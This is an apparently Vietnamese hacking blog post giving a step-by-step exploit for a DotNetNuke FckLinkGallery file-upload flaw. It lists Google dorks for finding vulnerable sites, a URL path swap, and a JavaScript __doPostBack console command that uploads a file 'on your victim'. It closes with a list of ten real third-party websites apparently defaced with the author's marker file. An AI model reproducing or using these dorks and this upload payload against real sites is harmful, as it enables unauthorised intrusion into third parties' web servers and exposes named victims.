Thứ Tư, 28 tháng 1, 2015

[DNN] FckLinkGallery Vulnerability - File Uploader

Dork:

inurl:fcklinkgallery.aspx
inurl:/tabid/36/language/en-US/Default.aspx

Copy and Paste Dork On Google.com
Choose Any Site

Like This:
http://www.domain.com/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx
Or
http://domain.com/home/tabid/36/language/en-US/default.aspx

Replace

/home/tabid/36/language/en-US/default.aspx
To:
/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx

You Will See Like This:



Choose Line 3: File ( A File On Your Site )

Press F12 -> Console And Paste This JS
javascript:__doPostBack('ctlURL$cmdUpload','')
Like This:


Upload Your File On Your Victim

DEMO
http://iiit.org/portals/0/FireAngel.txt
http://www.bwwines.com/portals/0/FireAngel.txt
http://www.lokc.org/portals/0/FireAngel.txt
http://www.henricocasa.org/Portals/0/Cache/FireAngel.txt
http://www.kicc.org.uk/Portals/0/Cache/FireAngel.txt
http://www.exemplaronline.com.au/portals/0/FireAngel.txt
http://www.togetherinsong.org/portals/0/FireAngel.txt
http://www.valeron.eu/portals/0/FireAngel.txt
http://www.mesure.es/portals/0/FireAngel.txt
http://www.sensorcast.com/portals/0/FireAngel.txt
Người đăng: vào lúc
Nhãn: , ,

Không có nhận xét nào:

Đăng nhận xét

Đăng ký: Đăng Nhận xét (Atom)